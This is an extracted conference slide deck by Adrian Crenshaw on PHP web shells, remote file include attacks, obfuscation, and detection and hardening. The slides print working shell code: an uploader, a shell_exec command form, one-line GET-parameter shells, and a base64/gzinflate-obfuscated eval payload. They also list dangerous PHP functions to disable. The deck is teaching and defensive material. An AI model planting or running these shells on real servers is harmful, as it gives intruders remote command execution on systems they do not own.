History, Techniques, Obfuscation and Automated Collection Adrian Crenshaw

hopeacceptableΛογισμικό & κατασκευή λογ/κού

28 Οκτ 2013 (πριν από 3 χρόνια και 9 μήνες)

225 εμφανίσεις

http://Irongeek.com

History, Techniques, Obfuscation

and
Automated
Collection

Adrian
Crenshaw


http://Irongeek.com


Scripts that act as back doors for maintaining access


Common tasks:


File Management


Command line access


Database server access


Bruteforcing


Network Scanning


Pivots


Versions for all sorts of web development environments:
PHP, ASP.NET, JSP, etc.


Think of it as a RAT (Remote Access Tool/Trojan) for the web

http://Irongeek.com


File upload vulnerabilities


Insecure FTP


Command Injection


Remote File
Includes/Local File Includes


Exploits on other sites on the same shared host


Other Exploits


SQL Injection


Vulnerable services


http://Irongeek.com

1.
Client makes a request to a site
with an RFI vulnerability

2.
Vulnerable web server grabs
malicious file off of another server

3.
File is included in code executed
on the
vulnerable web server

4.
Attacker then executes commands
on the remote vulnerable
web
server, uploads different shells,
grabs files, etc.


http://Irongeek.com


C99


C100


r57


Fx29SheLL


PLaToShell


b374k


WSO


Weevely


http://Irongeek.com


Started as a project to show off web vulnerabilities


Like
WebGoat
, but designed to be easier to use and
PHP based


I started it, but Jeremy
Druin

is in charge of it now
and has way more code in it than I do

http://Irongeek.com


<FORM

ENCTYPE
=
"multipart/form
-
data"

ACTION
=
"
<?
php

echo

"http://"

.

$_SERVER
[
'HTTP_HOST'
]

.

$_SERVER
[
REQUEST_URI
];
?>
"

METHOD
=
"POST"
>

Send this file:

<INPUT

NAME
=
"
userfile
"

TYPE
=
"file"
>

<INPUT

TYPE
=
"submit"

VALUE
=
"Send"
>

</FORM>

<?
php

if

(
$_FILES
[
"
userfile
"
][
"error"
]

>

0
){


echo

"Error: "

.

$_FILES
[
"
userfile
"
][
"error"
]

.

"<
br
>"
;


}
else
{


if

(
$_FILES
[
"
userfile
"
][
"name"
]

!=

""
){


echo

"Upload: "

.

$_FILES
[
"
userfile
"
][
"name"
]

.

"<
br
>"
;


echo

"Type: "

.

$_FILES
[
"
userfile
"
][
"type"
]

.

"<
br
>"
;


echo

"Size: "

.

(
$_FILES
[
"
userfile
"
][
"size"
]

/

1024
)

.

"
kB
<
br
>"
;


echo

"Stored in: "

.

$_FILES
[
"
userfile
"
][
"
tmp_name
"
]

.

"<
br
>"
;


if

(
move_uploaded_file
(
$_FILES
[
"
userfile
"
][
"
tmp_name
"
],

$_FILES
[
"
userfile
"
][
"name
"
])){


echo

"Moved to: "

.

getcwd
()

.

"/"

.

$_FILES
[
"
userfile
"
][
"name"
];


}
else
{


echo

'<font color="$FF0000">Upload failed, may not have permission.</font>'
;


}}}

#Based on examples from: http://
www.w3schools.com/php/php_file_upload.asp

?>


http://Irongeek.com

<HTML><BODY>

<FORM

METHOD
=
"post"

ACTION
=
"
<?
php

echo

"http://"

.

$_SERVER
[
'HTTP_HOST'
]

.

$_SERVER
[
REQUEST_URI
];
?>
"
>

<INPUT

TYPE
=
"TEXT"

NAME
=
"command"
>

<INPUT

TYPE
=
"Submit"
>

</FORM>

<PRE>

<?
php

$command

=

str_replace
(
"
\
\
\
\
"
,
"
\
\
"
,
$_POST
[
command
]);


echo

"<B>Results for
$command
: </B><P>"
;

$results

=

str_replace
(
"<"
,
"&
lt
;"
,
shell_exec
(
$command
));

$results

=

str_replace
(
">"
,
"&
gt
;"
,
$results
);

echo

$results
;

?>

</PRE>

</BODY></HTML>

http://Irongeek.com


Example 1:

<?=($_=@$_GET[2]).@$_($_GET[1])?>


Example 2:

<?
echo `$_GET[1]`?>


Could not get these to RFI


Inspired By Fredrik
Almroth

http://h.ackack.net/2011/09/tiny
-
php
-
shell
/


http://Irongeek.com

1.
RFI the
uploader


Simpler


Smaller

2.
Upload a shell

http://Irongeek.com


Why not let the hosting site know they are serving a
shell?

User Agent String:

Hello
,
I'm
not attacking your site, but someone else tried using
this file on your server as an RFI against my site. Contact
Irongeek

at Irongeek.com for more details
http://
www.irongeek.com/i.php?page=webshells
-
and
-
rfi

http://Irongeek.com


Uploaders


General
Webshells


Testers/
IDers


Just emails the attacker that a site in vulnerable, maybe gives a bit of
information about the system


Search Engine Spammers


Just show the links to search engines based on user agent strings to
get higher ranking via back links


Booters



Botnets based on
webshells


Webservers generally have more bandwidth than workstations


Local rooters


Elevate privileges using local exploits

http://Irongeek.com

echo

'<HTML><BODY><FORM METHOD="post" ACTION="'
.
"http://"

.

$_SERVER
[
'HTTP_HOST'
]

.

$_SERVER
[
REQUEST_URI
].
'"><INPUT TYPE="TEXT" NAME="command"><INPUT TYPE="Submit"></FORM><PRE>'
;

$command

=

str_replace
(
"
\
\
\
\
"
,
"
\
\
"
,
$_POST
[
command
]);


echo

"<B>Results for $command: </B><P>"
;

$results

=

str_replace
(
"<"
,
"&
lt
;"
,
shell_exec
(
$command
));

$results

=

str_replace
(
">"
,
"&
gt
;"
,
$results
);

echo

$results
;

echo

"</PRE></BODY></HTML>"
;


Run through
http
://
www.mobilefish.com/services/php_obfuscator/php_obfuscator.php


<?
php

eval
(
gzinflate
(
base64_decode
(
str_rot13
(
'
qMSsn4ZjSZKs+lxhS5xIve7KTXue
ufY8fkwUFvsFhJjBqVdzfV+/XNdwfQlR5CV7557YyIKqtHxPRG1F4vsURlHCPL
8tLvWVwu723ntDQipvGTVCGEgecsd94lQLLWDM48+Za81NvYDZxxlLkq86
M085l0FM87PjGnDxwAAptQvymRCOKtEPsVw0h+en9iY9sxAx17s2F+zvZ0J
vWBJZzh7TJTwjLSEQBpv+hIElv6/64N6alluGUrn8tVKyjxMBtlYkXMswgIRws
UDQeSM7VV6iT1QH9fZP3AtG7K3KXOq3Ll2occD/fgdhOco1i5OBjf9WhOVn
ahBfs3qA50jw6vwmUck5Xrw+Nt==
'
))));

?>

http://Irongeek.com


GET is in the URL, POST is in the request headers


POST method less likely to be logged than GET


With a custom client, stealth commands via:


Cookie headers


N
on
-
cookie headers


Multiple levels of obfuscation making it computationally
expensive to decode


http://Irongeek.com


Available
at:
https://
github.com/epinna/Weevely



Tiny, encrypted, communication over cookies, tons
of modules:


Enumerate users and /
etc
/
passwd

content


Check
php

security
configurations


Crawl
and enumerate web folders files
permissions


Find wrong system files permissions


Guess files with wrong permissions in
users home folders


Bruteforce

all SQL users


Bruteforce

SQL username


Collect system
informations


Send reverse TCP shell


Open a shell on TCP port


Execute system shell command


Execute PHP statement


Mount remote
filesystem

using
HTTPfs



Change file timestamps


Remove remote files and folders


Get SQL database dump


Run SQL console or execute single queries


Install and run Proxy to tunnel traffic
through target


Print interfaces addresses


Port scan open TCP ports


Install remote PHP proxy


Find files with write


Find files with
superuser

flags

http://Irongeek.com

//Example from Laudanum

$
allowedIPs

=

array
(
"192.168.1.55"
,

"12.2.2.2"
);

$
allowed
=

0
;

foreach

(
$
allowedIPs

as $IP
)

{


if

(
$_SERVER
[
"REMOTE_ADDR"
]

==

$IP
)


$allowed
=

1
;

}

if

(
$allowed
==

0
)

{


header
(
"HTTP/1.0 404 Not Found"
);


die
();

}

http://Irongeek.com

http://Irongeek.com


Ugly,
but
works:

grep

-
i

"=http://"
access.log |
grep

-
i

"
\
.txt
\
|
\
.
inc
\
.
\
|
\
.
dat
"


May like my script better


http://Irongeek.com


AV will mostly miss them


PHP
-
Shell
-
Detector

Just signature based to my knowledge

Scans:
php
/
perl
/asp/
aspx


https
://
github.com/emposha/PHP
-
Shell
-
Detector



NeoPI

Detects
on Signatures,
Entropy
,
Longest Word and
Index of
Coincidence

Scans:
php
/asp/
aspx
/
sh
/bash/
zsh
/
csh
/
tsch
/
pl
/
py
/
cgi
/
cfm

https
://
github.com/Neohapsis/NeoPI


http://Irongeek.com


Grep


PHP
-
Shell
-
Detector


NeoPI


http://Irongeek.com

http://Irongeek.com

http://Irongeek.com

Much of the following text copied from

/
etc
/php5/apache2/php.ini


http://Irongeek.com


Allow
ASP
-
style <% %>
tags.

asp_tags

= Off

http://
php.net/asp
-
tags


PHP Banner in web server header

expose_php

= On

http
://
php.net/expose
-
php



Whether
to allow HTTP file
uploads.

file_uploads

= On

http://
php.net/file
-
uploads



Display Errors

display_errors

= On

http://
php.net/display
-
errors


http://Irongeek.com


Whether
to allow the treatment of URLs (like http:// or
ftp://) as
files.

allow_url_fopen

= On

http://
php.net/allow
-
url
-
fopen



Whether
to allow include/require to open URLs (like http://
or ftp://) as files. (Off by default in now
.)

allow_url_include

=
Off

http://
php.net/allow
-
url
-
include



Disable
easily abused functions

disable_functions
=
system,exec,passthru,
shell_exec

http
://php.net/manual/en/ini.core.php#ini.disable
-
functions



http://Irongeek.com


Turn off Directory
indexing


Add this to .
htaccess

file or Directory
configs
:

Options
-
Indexes


An example of why:

http://
www.google.com/?
q=intitle:index.of+c99.txt



http://Irongeek.com


Shared Hosting MD5 Change Detection
Script

http
://
www.irongeek.com/i.php?page=security/sha
red
-
hosting
-
md5
-
change
-
detection
-
script


Script
To
Grep

For RFI,
Webshells
, Password Grabs,
Web Scanners, Etc.

http://
www.irongeek.com/i.php?page=security/log
watch
-
script
-
grep
-
for
-
rfis
-
webscanners
-
webshell
-
attacks


http://Irongeek.com

Derbycon

Sept
25th
-
29th,
2013

http://
www.derbycon.com









Others

http
://www.louisvilleinfosec.com

http://skydogcon.com


http://hack3rcon.org






http://outerz0ne.org

http
://phreaknic.info


http://notacon.org


Photo Credits to KC (
devauto
)

Derbycon

Art Credits to
DigiP

http://Irongeek.com

42



Twitter: @
Irongeek_ADC